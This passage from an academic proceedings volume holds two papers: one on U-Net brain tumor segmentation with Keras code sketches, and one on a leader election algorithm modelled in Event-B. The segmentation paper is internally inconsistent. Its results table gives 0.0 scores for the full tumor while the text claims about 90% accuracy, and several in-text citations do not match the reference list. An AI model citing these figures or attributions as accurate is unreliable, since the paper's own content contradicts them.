Computer Methods and Programs in Biomedicine.
26. American Academy of Dermatology Association. (2021). Skin Cancer. Retrieved from https://www.aad.org/media/stats-skin-cancer.
Computerized Assisted Segmentation
of Brain Tumor Using Deep
Convolutional Network

Deepa Verma and Mahima Shanker Pandey

Abstract The number of cases related to brain tumors has risen dramatically in recent years, affecting people of all age groups, including children. Brain tumor treatment is challenging, especially in determining the spread of the tumor. Magnetic resonance imaging (MRI) has been developed for diagnosing brain tumors without ionizing radiation. Manual segmentation of brain tumors from MRI scans can be tedious and time-consuming, and the performance may vary if the person diagnosing the scans changes. Therefore, a more efficient and reliable method for segmentation of the brain tumor is necessary. This paper discusses a segmentation algorithm for brain tumors with the help of U-Net type deep convolutional networks.

Keywords Segmentation · Deep convolutional network · U-Net · Region growing

1 Introduction

Brain tumors are invasive and can be dreadful; they can become cancerous and affect the motor functions of different parts of the brain. Magnetic resonance imaging (MRI) images of brain tumors are taken as input for diagnosis and treatment planning. MRI scans are used to measure brain tumor vascularity, cellularity, and blood–brain barrier (BBB) integrity. Variations in the size, shape, location, and appearance of tumors pose a challenge, and the unsupervised and supervised techniques proposed in the past have been quite successful, but not as much as expected. Even a slight mistake can cost the patient his/her life, so a more efficient method of brain tumor image segmentation is required. Unsupervised learning methods like fuzzy clustering with region growing have proven successful in the past, with accuracy reaching up to 77%. Supervised learning methods like extremely randomized forests with superpixel-based segmentation have also proven quite successful, with accuracy reaching up to 88%. With

D. Verma · M. S. Pandey (B)


Department of Computer Science and Engineering, Institute of Engineering and Technology, Lucknow, India


Fig. 1 T1, T1C, T2, FLAIR MRI Scans

the increasing complexity of deep convolutional neural networks and the introduction of skip architectures, the segmentation of brain images can be done more efficiently than with the supervised and unsupervised techniques applied earlier. Therefore, this paper employs U-Net, which contains skip architectures, to segment brain images.
A segmentation algorithm for brain tumors based on U-Net type deep convolutional networks is presented in this paper. A general view of brain tumor identification is given in this introduction section. Section 2 focuses on a literature review of current medical diagnosis research using U-Net type deep convolutional networks. The fundamentals and architecture of U-Net and deep residual networks are explained in Sect. 3. Section 4 includes the methodology (algorithm and flow chart) and the dataset used. Section 5 gives the results and the performance of the algorithm. Section 6 discusses the conclusion and future scope of the proposed segmentation algorithm (Fig. 1).

2 Literature Review

Studying MRI images of brain tumors is a critical step, and manual image segmentation of the tumor takes much time, since it is normally a slice-by-slice procedure whose results depend on the operator's knowledge; it is difficult for even the same operator to reproduce the same result again. Moreover, HGG tumors present irregular boundaries that may also involve discontinuities due to aggressive tumor intrusion, which may cause problems and result in poor tumor delineation [10]. Automatic tumor segmentation removes these problems of manual segmentation.
Supervised learning methods require training data to learn a classification model so that new instances can be categorized and segmented. Both appearance and context-based features were classified with 83% accuracy using an extremely randomized forest. Extremely randomized trees classification combined with superpixel (groups of pixels similar in color and other low-level properties) based segmentation of MRI scans obtained 88% overall accuracy of full tumor segmentation for both LGG and HGG cases.
Data augmentation [1] is the method of applying various techniques to create more images by modifying the original data while keeping both the original and the new data; this process of increasing the amount and diversity of data is called data augmentation. Data augmentation was necessary for this project because the BraTS dataset is small and convolutional neural networks need a fairly big dataset to achieve promising results. Song et al. [11] propose adaptive brain tumor detection that uses a support vector machine in an unsupervised manner. Devkota et al. [12] address brain tumor segmentation on MRI images with an accuracy of 89.5%. Zahra et al. [13] use an artificial neural network algorithm to classify tumor types.
U-Net
The U-Net paper by Olaf Ronneberger, Philipp Fischer, and Thomas Brox, titled U-Net: Convolutional Networks for Biomedical Image Segmentation [2], was referred to in order to understand and implement the U-Net architecture model.
Network Architecture
It consists of a contracting path (left side) and an expansive path (right side). The contracting path follows the typical architecture of a convolutional network (Fig. 2).
Deep Residual Network (involving skip connections)
In conventional neural networks, each layer feeds only into the next layer. In contrast, each layer feeds into the next layer and also directly into the layers 2–3 hops away in a network with

Fig. 2 U-Net architecture



residual blocks. Neural networks are universal function approximators, and the performance of networks improves as the number of layers increases. However, there is a limit on how many layers can be added while still improving accuracy. Sufficiently deep networks may be unable to learn even simple functions such as the identity function, due to issues such as vanishing gradients and the curse of dimensionality. Therefore, simply adding more layers to the neural network and training them does not help. Training of a few layers can be skipped by adding skip connections / residual connections. Skip connections were referred to from [3].
Skip Connection
Skip connections are shortcuts that convolutional neural networks employ to jump over some layers, so that training of those layers can be skipped.
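To make the idea of a skip (residual) connection concrete, the following is a minimal tf.keras sketch of a residual block in which the block input is added back to the output of two convolutional layers; it is an illustration of the general technique, not the specific blocks used in this work.

# Minimal residual (skip-connection) block sketch in tf.keras.
from tensorflow.keras import layers

def residual_block(x, filters):
    # The shortcut carries the input past the two convolutional layers.
    shortcut = x
    y = layers.Conv2D(filters, 3, padding="same", activation="relu")(x)
    y = layers.Conv2D(filters, 3, padding="same")(y)
    # If the channel count changes, project the shortcut with a 1x1 convolution.
    if x.shape[-1] != filters:
        shortcut = layers.Conv2D(filters, 1, padding="same")(shortcut)
    y = layers.Add()([shortcut, y])   # skip connection: add the input to the block output
    return layers.Activation("relu")(y)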
MultiResUNet
The classical U-Net is lacking in certain aspects, for example when the shape and size of the images vary, and can then produce poor results. To overcome this, MultiResUNet was introduced. In MultiResUNet, Inception-like blocks (from Google Inception-V3) were introduced to replace some of the convolutional layers, which enables the U-Net to learn features from images at different scales. The 5 × 5 and 7 × 7 convolutional layers were factorized using 3 × 3 convolutional blocks. Then a residual connection was added due to its efficacy in biomedical segmentation. MultiResUNet was referred to from [4].
Synthetic Segmentation in 3D MRI Scans
To increase the contrast within subregions of brain tissue, a generative adversarial network (GAN) is used. It generates synthetic images from the FLAIR MRI scan. These synthetic images, along with the FLAIR, T1ce, and T2 scans, are then input to a 3D fully connected network (FCN) to segment tumor regions. This was referred to from [5].
Dense-Vnet
MRI scans and brain masks were used to train a convolutional neural network, Dense-Vnet. Dense-Vnet is made up of three layers of dense feature stacks with concatenated outputs (Fig. 3).

Fig. 3 Dense-Vnet Architecture



3 Methodology

Here we discuss the proposed approach and the methods used in processing the images.
Image Segmentation
An image can be divided or partitioned into different sections, called segments. It is not efficient to process the whole image at once, because there will be areas where no useful details are present; by splitting the image into segments, only the important segments need to be used for image processing. Image segmentation is a technique for grouping together pixels with similar characteristics.
Dataset
BraTS 2019 uses multi-institutional pre-operative MRI scans and focuses on the segmentation of intrinsically heterogeneous (in appearance, structure, and histology) brain tumors, namely gliomas. In addition, BraTS'19 also focuses on estimating overall patient survival by unifying analyses of radiomic features and machine learning algorithms to identify the therapeutic significance of this segmentation task. The dataset consists of 220 occurrences of HGG (high-grade glioma) cases and 54 instances of LGG (low-grade glioma) cases.
Network Architecture
A 9-layer U-Net was used to segment the full tumor from the MRI scan. This was done by giving the Flair and T2 MRI scans as input to the 9-layer U-Net; the output was the segmented image of the overall tumor. The middle point of this segmentation was calculated, and the image was cropped to segment the core and ET parts of the tumor. The cropped full tumor segmentation was given as input to a 7-layer U-Net, whose output is the core and ET part of the tumor if sufficient pixels were present in the region (Fig. 4).
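For illustration, a minimal U-Net-style encoder-decoder in tf.keras is sketched below. The depth, filter counts, and the two-channel (Flair and T2) input shape are assumptions chosen for brevity; they do not reproduce the exact 9-layer and 7-layer configurations described above.

# Minimal U-Net-style encoder-decoder sketch in tf.keras (illustrative only).
from tensorflow.keras import layers, Model

def conv_block(x, filters):
    x = layers.Conv2D(filters, 3, padding="same", activation="relu")(x)
    x = layers.Conv2D(filters, 3, padding="same", activation="relu")(x)
    return x

def small_unet(input_shape=(240, 240, 2), n_classes=1):
    inputs = layers.Input(input_shape)
    # Contracting path
    c1 = conv_block(inputs, 32)
    p1 = layers.MaxPooling2D()(c1)
    c2 = conv_block(p1, 64)
    p2 = layers.MaxPooling2D()(c2)
    # Bottleneck
    b = conv_block(p2, 128)
    # Expansive path with skip connections back to the contracting path
    u2 = layers.UpSampling2D()(b)
    c3 = conv_block(layers.concatenate([u2, c2]), 64)
    u1 = layers.UpSampling2D()(c3)
    c4 = conv_block(layers.concatenate([u1, c1]), 32)
    outputs = layers.Conv2D(n_classes, 1, activation="sigmoid")(c4)
    return Model(inputs, outputs)

model = small_unet()   # full-tumor segmentation network on 240 x 240 inputs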
Algorithm
1. Initially, a single U-Net model was used to segment the full tumor, tumor core, and enhancing tumor (ET). It was found that the full tumor got segmented, but the core and ET were not properly segmented, or not segmented at all. The problem arose because the core and ET of the tumor are too small compared to the whole tumor and consist of fewer pixels, so the model sometimes predicted that there is no tumor.
2. To solve the problem, the full tumor was first predicted by feeding the Flair and T2 MRI scan images into a 9-layer U-Net. The full tumor prediction was then cropped to extract the core and ET parts from the T1ce MRI scan by calculating the middle point of the full tumor prediction, which contained most of the pixels.
3. The cropped parts were fed into another 7-layer U-Net, which was used to predict the core and ET of the tumor. In post-processing, a coloring algorithm was applied, and the core and ET predictions were pasted back onto the full tumor prediction after applying different colors to the core and ET.
4. The learning rate for the training process of both U-Nets was taken to be 1e-4; the original images were 240 × 240, and the extracted core and ET crops were 64 × 64.

Fig. 4 Model used

5. Models were trained for 100 to 300 epochs until convergence occurred. Dice loss was used (a minimal implementation sketch of this loss is given after this list).
6. Dice Loss = 1 − Dice coefficient.
7. Dice coefficient = (2 × Σ(true × pred) + smooth) / (Σ true + Σ pred + smooth), where smooth is a factor used to smooth out boundary predictions so that the boundary is not crisp.
8. A 9-layer U-Net architecture was used (with the 4th and 6th blocks removed to form the 7-layer U-Net) (Fig. 5).
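The following is a minimal TensorFlow sketch of the Dice coefficient and Dice loss described in steps 6 and 7; the value of the smoothing constant is an assumption.

# Dice coefficient and Dice loss sketch (illustrative; smooth = 1.0 is an assumption).
import tensorflow as tf

def dice_coefficient(y_true, y_pred, smooth=1.0):
    y_true = tf.reshape(y_true, [-1])
    y_pred = tf.reshape(y_pred, [-1])
    intersection = tf.reduce_sum(y_true * y_pred)
    return (2.0 * intersection + smooth) / (
        tf.reduce_sum(y_true) + tf.reduce_sum(y_pred) + smooth)

def dice_loss(y_true, y_pred):
    return 1.0 - dice_coefficient(y_true, y_pred)

Such a function can be passed as the loss argument when compiling a Keras segmentation model.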
Flow Graph of Proposed Model
The BraTS dataset is used each year for the multimodal brain tumor segmentation and detection competition. A test accuracy of around 90% is achieved.
We consider the results in terms of recall, precision, and F1 score (Figs. 6, 7, 8).

Precision = TP / (TP + FP)
Recall = (TP / (TP + FN)) × 100
F1 Score = 2 × (Precision × Recall) / (Precision + Recall)
Here TP = true positives, FP = false positives, and FN = false negatives.
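For completeness, a small sketch showing how these metrics can be computed from raw counts (the counts used in the example call are hypothetical):

# Precision, recall, and F1 score from true/false positive and false negative counts.
def precision_recall_f1(tp, fp, fn):
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0
    return precision, recall, f1

print(precision_recall_f1(tp=91, fp=9, fn=10))   # hypothetical counts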

Challenges

Fig. 5 A Flow graph of the proposed model

• There can be many challenges that the application may face, such as low-resolution MRI scans or a small amount of data in the case of training on new data (transfer learning).
• Usually, the resolution and tissue contrast of the acquired data going into segmentation algorithms are too low for most algorithms to accurately identify many small subregions.
• The boundaries of the tumor may sometimes not be well defined in the MRI scan, which may lead to wrong segmentation.

Fig. 6 Result: original data (flair, t1ce, t1, t2) and predictions (full tumor, core, ET, final)

Fig. 7 Result table
            FT    Core   ET
Precision   0.0   0.50   0.91
Recall      0.0   0.97   0.90
F_Score     0.0   0.65   0.90

Fig. 8 Loss plot



4 Conclusion

This paper presents an approach for the detection and segmentation of brain tumors using the U-Net CNN on both HGG and LGG cases, and it proves to be more efficient than the previous unsupervised and supervised methods that used conventional machine learning techniques. Data augmentation decreased the training time to a large extent, which enabled training to be completed in 2–3 days. A test accuracy of about 90% was achieved. This work could be extended in the future to use the MRI image of a brain with a tumor to find the size of the tumor and to determine its type and stage; to achieve this, a 3D U-Net can be used in place of the conventional U-Net. MultiRes U-Net can also be used in the future instead of the classical U-Net to obtain better results; in this variant, certain convolutional layers of the U-Net are replaced with convolutional blocks of the Google Inception-V3 convolutional neural network. Then, skip connections as used in residual networks can be employed, which allow the features from previous layers to be reused along with the features obtained after convolution. A generative adversarial network (GAN) can be used to generate synthetic images of increased contrast which can be used for segmentation to obtain better results. Dense-Vnet can be used to harness the benefits of both DenseNet and U/V-Net: DenseNet contains skip connections which can be used to obtain both the original features and the features obtained after the layers for training, while U/V-Net follows an encode–decode path; combining both will produce better results. A smaller CNN can also be explored by trial and error, which may give as good a result as DenseNet or U-Net.

References

1. Wang, J., & Perez, L. (2017). The effectiveness of data augmentation in image classification using deep learning. Stanford University.
2. Ronneberger, O., Fischer, P., & Brox, T. U-Net: Convolutional networks for biomedical image segmentation. MICCAI.
3. He, K., Zhang, X., Ren, S., & Sun, J. (2015). Deep residual learning for image recognition. Microsoft Research.
4. Ibtehaz, N., Sohel Rahman, M. (2019). MultiResUNet : rethinking the U-Net architecture for
multimodal biomedical image segmentation. Neural Networks Journal.
5. Hamghalam, M., Lei, B., & Wang, T. (2020). Brain Tumor Synthetic Segmentation in 3D
Multimodal MRI Scans.
6. Ranjbar, S., Singleton, K. W., Curtin, L., Rickertsen, C. R., Paulson, L. E., Hu1, L. S., Mitchell,
J. R., & Swanson, K. R. (2020). Robust automatic whole brain extraction on magnetic resonance
imaging of brain tumor patients using dense-Vnet.
7. Liu, Z., Chen, L., Tong, L., Zhou, F., Jiang, Z., Zhang, Q., Shan, C., Zhang, X., Li, L., & Zhou,
H. (2020). Deep learning based brain tumor segmenta tion: a survey.
8. Sun, Y., Wang, C. (2020). A computation-efficient CNN system for high-quality brain tumor
segmentation.
9. Liu, D., Zhang, H., Zhao, M., Yu, X., Yao, S., & Zhou, W. (2018). Brain tumor segmentation based on dilated convolution refine networks. In 2018 IEEE 16th International Conference on Software Engineering Research, Management and Applications (SERA).
10. Dong, H., Yang, G., Liu, F., Mo, Y., & Guo, Y. (2017). Automatic brain tumor detection and segmentation using U-Net based fully convolutional networks.

11. Adhikary, S., Pimpalkar, A., & Kendhe, A. (2016). Detection of brain tumor from MRI images
by using segmentation and SVM. IEEE.
12. Sankari, D., & Vigneshwari, S. (2017). Automatic tumor segmentation using convolutional neural networks. In 2017 Third International Conference on Science Technology Engineering & Management (ICONSTEM).
13. Borase, Z. V., Naik, G., & Londhe, V. (2018) Brain MR image segmentation for tumor detection
using artificial neural network. International Journal of Engineering and Computer Science
(IJECS).
Leader Election Algorithm in Fault
Tolerant Distributed System

Sudhani Verma, Divakar Yadav, and Girish Chandra

Abstract Reliability and availability are two important aspects of a fault-tolerant distributed system. A replicated database system helps to improve the availability of a distributed system, but in order to maintain reliability we need to maintain consistency among the replicas. Consensus protocols are used to achieve coordination among replicas, and the leader plays a pivotal role in these consensus algorithms. The leader works as a powerful tool for gaining consistency and reducing the overhead of maintaining coherency among replicas. The leader election process requires consensus among sites to elect one site as the leader of the system. In this article, we present the formal development of a leader-based election system in Event-B by proposing an algorithm, leader election using ordered delivery (LEOD). This paper highlights the importance of message ordering at the delivery end in designing algorithms for leader election in distributed systems. We conclude the paper by giving specifications of the algorithm in Event-B using the RODIN platform.

Keywords Formal methods · Leader election · Event-B · Message ordering

1 Introduction

A distributed system consists of several independent processing components communicating through messages via interconnecting communication links. The prime objective is to provide a service by running algorithms that control the processing components of the distributed system in order to attain a collective goal. The services are provided in response to clients' requests. Although the easiest way to implement this architecture is a centralized server architecture, this approach does not scale well as the number of clients increases. Moreover, the service is only as fault tolerant as the
S. Verma (B) · D. Yadav · G. Chandra


Institute of Engineering and Technology, AKTU, Lucknow 226021, UP, India
e-mail: 2307@ietlucknow.ac.in
D. Yadav
e-mail: dsyadav@ietluckknow.ac.in


centralized server running that service. In case of any fault, we must have a fault tol-
erant system which can keep the service available. A fault-tolerant system executes
the algorithms to control and make distributed system available for certain services
in the presence of failures. More a system can tolerate failure, higher is the resilience
to failures and more dependable the system becomes [1].
Fault tolerance in the system can be provided by replication. State machine repli-
cation is a famous approach for implementing fault-tolerant system [2]. In such
system, same data is replicated on different processors. These replicated processors
are referred as replicas, and algorithms are executed to coordinate client’s interaction
with these replicas. Replication of data objects improves system’s availability, but
keeping these replicas identical is a complex process. It is believed that designating
a single node as coordinator in a distributed system makes it easy to achieve the
coherency among replicas. The coordinator is also referred as leader or primary site
in the system. Leader election is highly efficient in improving the performance and
reducing the overhead of coordination among other servers. The consensus proto-
cols used in a fault tolerant distributed system implemented through replicated state
machine such as PAXOS [3], RAFT [4] have fundamentally worked on leader elec-
tion, where a leader is elected and the elected node instructs other nodes to achieve
consistency and coherency among replicas. Leader based consensus algorithms syn-
chronize replicated state machines to ensure that all replicas have the same view
of the system state. Electing leader in a distributed system is a difficult process
as coordination is required among processes to exchange information to reach an
agreement. Each process must agree on a specific node as the leader of a system.
Along with some classic algorithms for leader election like Bully and Ring algo-
rithm, several algorithms have been proposed for leader election [5–7]. We propose
a leader election algorithm in which timestamps and ordering of the messages are
taken into consideration. The paper is divided into five sections, Sect. 1 is introduc-
tion. In Sect. 2 we discuss the importance of message ordering, in Sect. 3 proposed
algorithm is presented. Later in Sect. 4, a formal model of the proposed algorithm is
given in event-B developed on RODIN platform and in Sect. 5 we state the conclusion
and future scope of the proposed algorithm.

2 Message Ordering

An important element of process execution in a distributed environment is the order of delivery of messages, as it defines the messaging behavior that a distributed application can anticipate. Ordered delivery of messages makes a system more fault-tolerant against the faults that may arise from unordered delivery of messages [8, 9]. A global ordering of messages may be defined by employing logical clocks [10]. The ordering paradigms for messages are: non-FIFO, FIFO, causal order, and total order. The total order property constrains the destination-based order of message delivery and is not dependent on the sender processes. The concept can be further constrained by two sender-related properties, namely FIFO and causal order.

2.1 Non-FIFO and FIFO Execution

When, on a logical link between two nodes, messages may be delivered in any order and not necessarily in first-in first-out manner, the execution is known as non-FIFO, whereas in a FIFO execution messages are delivered in first-in first-out manner. Non-FIFO and FIFO executions are shown in Fig. 1a, b, respectively.

2.2 Causal Ordering

In a causally ordered execution, suppose we have two send events S and S′ that are causally related (not merely ordered by physical time); then their receive events R and R′ at all common destinations must occur in the same order. Causal ordering is trivially satisfied when the two send events S and S′ are concurrent (not causally related). In Fig. 2a, an execution that follows causal order is shown. In Fig. 2b, causal order is violated by the execution, since s1 ≺ s2 and r2 ≺ r1 at P1 (the common receiver). In Fig. 2c, the execution satisfies causal order, as the send events are not causally related.
In order to follow causal order in Fig. 2b, message m2 must be kept waiting at P1: since s1 ≺ s2, m1 must be delivered before m2 at P1.
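To make the causal delivery condition concrete, the following is a minimal vector-clock sketch in Python (an illustration only, not the specification developed later in the paper): a message is delivered only when it is the next expected message from its sender and all messages it causally depends on have already been delivered.

# Vector-clock based causal delivery check (illustrative sketch).
# Each process keeps a vector clock local_vc; every message carries the
# sender's vector timestamp msg_ts taken at send time.

def can_deliver(msg_ts, sender, local_vc):
    # The message must be the next one expected from its sender ...
    if msg_ts[sender] != local_vc[sender] + 1:
        return False
    # ... and must not depend on anything not yet delivered from other processes.
    return all(msg_ts[k] <= local_vc[k] for k in range(len(local_vc)) if k != sender)

def deliver(msg_ts, local_vc):
    # After delivery, merge the message timestamp into the local vector clock.
    return [max(a, b) for a, b in zip(local_vc, msg_ts)]

# Example: P1 (index 0) has delivered nothing; a message from P2 (index 1) stamped
# [1, 1, 0] depends on an undelivered message from P1, so it must be kept waiting.
print(can_deliver([1, 1, 0], sender=1, local_vc=[0, 0, 0]))   # False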

Fig. 1 Non-FIFO and FIFO execution

Fig. 2 Causal ordered execution



Fig. 3 Total ordered execution for concurrent processes

Fig. 4 Execution follows total order broadcast, but violates causal order

2.3 Total Order Broadcast

A total order broadcast may be regarded as a stronger form of reliable broadcast in which all messages must be received in the same delivery order by all recipients of the messages: if two processes Pi and Pj deliver messages Mx and My, then Pj delivers Mx before My if and only if Pi delivers Mx before My.
Total order broadcast is satisfied in Fig. 3, since m1 is delivered before m2 at each receiving end; the arrival of m2 shown by the dotted line at r2 is not possible if total order is followed for concurrent processes. In Fig. 4, total order is followed, but causal order is not satisfied.

3 Leader Election Algorithm with Ordered Delivery of Timestamped Messages

Leader election in a distributed system is the idea of assigning special duties to one process. These duties may include handling all client requests, modifying data in other nodes, assigning tasks to other nodes, and so on. The elected leader makes a system fault-tolerant by providing a single place to look for logs and metrics. We propose an algorithm, leader election using ordered delivery (LEOD), in which the ordered delivery of messages is taken into consideration. The proposed algorithm initiates its execution when there is no leader in the system and gives an equal opportunity to all sites to initiate the election process. Any site can begin the process by

broadcasting a timestamped request message. For the ordering of messages at the receiving end, we consider causal ordering for causally related events; if events are not causally related, messages are broadcast using total order broadcast. A vector logical clock is used to assign timestamps to the messages. We assume that all communication channels are FIFO channels and that communication is reliable. We also assume that all processes are correct, i.e., they never experience crash failures or byzantine failures.
Informal steps of the algorithm:
1. A site that wants to be the leader of the system broadcasts a timestamped request message to all the other sites.
2. Each receiving site sends a timestamped reply message as an acknowledgment and acceptance to the requesting site.
3. On the arrival of each reply message, the requesting site counts the number of received responses.
4. The requesting site declares itself as the leader of the system if the following conditions hold:
(a) All the received responses have a timestamp greater than the timestamp of the request message.
(b) A majority of the sites responded, i.e., the number of responding sites ≥ (M/2 + 1), where M is the total number of participating sites in the system.
5. The elected site performs the task.
6. After completing the task, the elected leader broadcasts a relinquish message to withdraw its authority as leader.
7. On the arrival of the relinquish message, a site proceeds in the following manner:
(a) If there is no request message from any other site waiting at its end, it can initiate the election process again;
(b) else, it responds to the request messages waiting at its end in increasing order of timestamp.
The conditions mentioned in point 4 above ensure that the oldest request message in the system gets priority in the leader election and that only one site is elected as leader at a particular time. On receiving the relinquish message, a site gets to know that there is no leader in the system; hence, participating sites may respond to a received request as per the timestamp of the received request, or may initiate a new election if there is no request waiting, as mentioned above in point 7.
We have four types of messages in the proposed algorithm:
Request message: This is the request message that is broadcast to all the other sites according to the ordering mechanism used in the algorithm. The same request message must also be delivered to the sender of the request message.
Acknowledgment and Acceptance Message: This accept message is sent as a response to the request message; it conveys an acknowledgement to the sender and acceptance of it becoming the leader.

Fig. 5 Process execution of the proposed algorithm with total and causal ordered delivery of
messages

Fig. 6 Process execution of the proposed algorithm with total and causal ordered delivery of
messages

Elect Message: When the requesting site (the sender of the request message) receives a majority of responses, it broadcasts a leader-elect message to declare itself as the leader.
Relinquish Message: When the elected leader completes its task, it broadcasts a relinquish message to let the other sites know that it has completed the task and that they can initiate the leader election process.
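To make the message handling concrete, the following is a simplified single-node sketch of the LEOD decision logic in Python. The class and method names are illustrative assumptions; the network transport is abstracted into a user-supplied send callable (which broadcasts a message, or sends it to one site when the optional to argument is given), and the timestamp comparison of condition 4(a) as well as ordered delivery are assumed to be handled by the underlying communication layer.

# Simplified sketch of one LEOD participant's message handling (illustrative only).
class LeodNode:
    def __init__(self, node_id, total_sites, send):
        self.node_id = node_id
        self.total_sites = total_sites
        self.send = send              # callable used to broadcast or send messages
        self.leader = None            # currently known leader, if any
        self.accepts = 0              # accept messages received for our own request
        self.pending = []             # (timestamp, sender) requests queued while a leader exists

    def request_leadership(self, ts):
        # Step 1: broadcast a timestamped request to all sites.
        self.accepts = 0
        self.send(("REQUEST", self.node_id, ts))

    def on_request(self, sender, ts):
        # Steps 2 and 7(b): accept immediately, or queue the request while a leader exists.
        if self.leader is None:
            self.send(("ACCEPT", self.node_id, ts), to=sender)
        else:
            self.pending.append((ts, sender))

    def on_accept(self, ts):
        # Steps 3 and 4: count accepts and claim leadership on a majority.
        self.accepts += 1
        if self.accepts >= self.total_sites // 2 + 1:
            self.leader = self.node_id
            self.send(("ELECT", self.node_id, ts))

    def on_relinquish(self):
        # Step 7: no leader any more; answer queued requests in increasing timestamp order.
        self.leader = None
        for ts, sender in sorted(self.pending):
            self.send(("ACCEPT", self.node_id, ts), to=sender)
        self.pending.clear()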
The execution of the proposed algorithm with causal ordering and total ordering is shown in Figs. 5 and 6. We consider three processes P1, P2, and P3 running on different sites in the system. Let P1 initiate the process by broadcasting a request message m1; on receiving the request, the other sites acknowledge it and send an accept message m2, so events e21 and e31 are causally preceded by event e11. If another site which has already accepted a request message wants to initiate the election process, as P3 does in Fig. 5 by sending request message m3, this is permissible, and the request should be accepted by the other sites. As events e31 and e32 are causally related, the accept message m2 must be delivered before the request message m3 at their common destination, i.e., P1, according to causal ordering. In Fig. 5, event e14, showing delivery of the m2 message (by the dotted line) after delivery of the m3 message, is therefore not acceptable. The request message m3 must wait until the previous request is fully processed by the requesting site.

Fig. 7 Concurrent processes with total ordered execution of the proposed algorithm

The next part of the execution is shown in Fig. 6. Whenever the requesting site receives a majority of the votes (i.e., M/2 + 1, where M is the number of sites), it broadcasts a message m4 claiming itself as the leader of the system (event e16 in Fig. 6). P1 acts as the leader of the system until it sends a relinquish message m5 to all the sites through event e17. The message m5 notifies the other sites that the previous leader has completed its task and that there is currently no designated leader in the system. Now a site will acknowledge the request messages from other sites (i.e., message m2) and send an accept message m6 (events e18 and e24). The events e16, e17, e18, and e24 are causally related to each other.
If two processes send request messages concurrently (at the same logical time), i.e., they are not causally related, then the ordering of the events is ensured by total order broadcast. In Fig. 7, the send events of processes P1 and P3 are concurrent and follow total ordering at the time of delivery; hence event e13′ (shown by the dotted line) is not acceptable at process P1. In this scenario, P3 will be elected as the leader, as discussed in the algorithm, since its request is received first by processes P1, P2, and P3 through events e12, e21, and e32, respectively.
After the leader election process has been executed, each node should recognize a particular node as the task leader. The nodes communicate among themselves in order to decide which one of them will enter the leader state, and each node has an equal opportunity of electing itself as the leader. The leader election problem can thus be seen as the problem of each node deciding whether it is the leader or not, with the constraint that exactly one node must decide that it is the leader. In the algorithm, the liveness property states that each processor must eventually be in one of two states, elected or not elected as leader, and the safety property states that in every execution exactly one node becomes the leader while the rest determine that they are not elected. The basic properties of such an algorithm are achieved in the proposed algorithm in the following manner:
Termination: The algorithm completes its execution in finite time, and one node is elected as the leader.
Uniqueness: Exactly one node claims itself as the leader of the system at a particular time.
Agreement: All other nodes know about the elected leader and agree on the election outcome.

4 Modeling Approach

Event-B [11, 12] is a formal technique that precisely and unambiguously describes the possible behavior of a system mathematically. The problem is described in an abstract model, followed by refinement levels introducing more detailed specifications. Event-B has two components, machine and context: the machine is the dynamic part of the model, while the context is the static part. The machine provides the behavioral properties of the model; it contains the variables, invariants, theorems, and events. The events have guards and actions, and at each refinement level these guards are strengthened. The variables must satisfy the invariants, and the invariants should be maintained by the activation of events. RODIN [13] is an industrial-level B tool that provides automated proof support; it generates the proof obligations and discharges them. Event-B has been used extensively in the formal verification of behavioral properties of distributed systems. Event-B specifications of global causal ordering for fault-tolerant transactions and of total order broadcast for distributed transactions on the RODIN platform have been presented in [14, 15], respectively. In [16], a formal approach to the modeling and verification of distributed transactions for replicated databases is presented. In the design of a distributed system, liveness and safety are two important issues to deal with. With respect to safety, RODIN generates proof obligations; in order to ensure that models are live and make progress, it has been proved in [17] that Event-B models are non-divergent and enabledness preserving. Security-critical systems are also modeled using Event-B; in [18], the incremental development of the Mondex electronic purse (used for financial transactions) system in Event-B is presented.

4.1 Event-B Model of Leader Election Algorithm: Specification Using Refinement Levels

(i) Abstract Level: In the abstract-level machine, we model the basic abstract objective of the algorithm. In the proposed leader election algorithm (LEOD), we assume that there is a set of sites among which a leader has to be chosen. In the context, we define a finite carrier set SITE. In the machine, we declare a variable leader that belongs to the power set of SITE and is elected by the execution of the event ElectLeader. The event executes only if there is no prior leader in the system.

MACHINE LeaderM
SEES LeaderC
VARIABLES s, leader
INVARIANTS s ∈ SITE, leader ∈ P(SITE)
EVENTS
  INITIALIZATION
    THEN leader := ∅, s :∈ SITE
  END
  ElectLeader
    WHEN leader = ∅
    THEN leader := {s}
  END
END

(ii) First Refinement Level: In the first refinement level, new variables and events are introduced. The following events are proposed in the first refinement level:
(a) Request_Vote: Whenever any site wants to become the leader of the system, it broadcasts a timestamped request message by executing this event.
(b) Receive_RequestVote: This event marks the delivery of the request message at the other sites.
(c) Response_Request: Through this event, a site sends its response to the requesting site.
(d) Response_Receive: This event signifies that the response of a particular site is delivered at the requesting site.
(e) ElectLeader: This abstract-level event is refined at this refinement level; when the requesting site receives a majority of responses, it declares itself as the leader and broadcasts a message notifying the same.
(f) Leader_Release: After the elected leader completes its task, it broadcasts a relinquish message through this event.
(g) Receive_LeaderRelease: The delivery of the relinquish message at the other sites is marked by this event.

5 Conclusion and Future Scope

Through replication of data objects at different sites, the availability of the system is enhanced; however, this introduces new challenges in keeping these replicas identical. Leader-based consensus protocols such as RAFT, PAXOS, and their variants are used to achieve this objective, and leader election eases the work of maintaining consistency among replicas. In this paper, we have outlined an algorithm for leader election and demonstrated its incremental development in Event-B using the RODIN platform. In future work, we intend to develop the specifications of the next refinement level, which captures the finer behavior of this system and gives more insight, and to demonstrate the techniques of incremental development in Event-B for achieving a correct and detailed specification of the system.

References

1. Kshemkalyani, S. (2005). Distributed computing book. Cambridge Company.


2. Schneider, F. B. (1990). Implementing fault-tolerant services using the state machine approach:
A tutorial. ACM Computing Surveys, 22(4), 299–319.
3. Lamport, L. (2001). Paxos Made Simple, ACM SIGACT News (Distributed Computing Col-
umn) 32, 4 (Whole Number 121, December 2001) pp. 51–58.
4. Ongaro, D., & Ousterhout, J. (2014). In search of an understandable consensus algorithm. In
Proceedings of the 2014 USENIX Conference on USENIX Annual Technical Conference (USA,
2014), USENIX ATC–14, USENIX Association, pp. 305–320.
5. Kordafshari, M. S., Gholipour, M., Jahanshasi, M., & Haghighat, A. T. (2005). Modified bully
election algorithm in distributed system. Wseas Conferences, Cancun, Mexico, May 11-14
2005.
6. Chang, H.-C., & Lo, C.-C. (2012). A consensus based leader election algorithm for wireless ad hoc networks. In International Symposium on Computer, Consumer and Control, Taichung, Taiwan, June 4–6, 2012.
7. Khanna, A., Kumar Singh, A., & Swaroop, A. (2014). A Leader-based k-local mutual exclusion
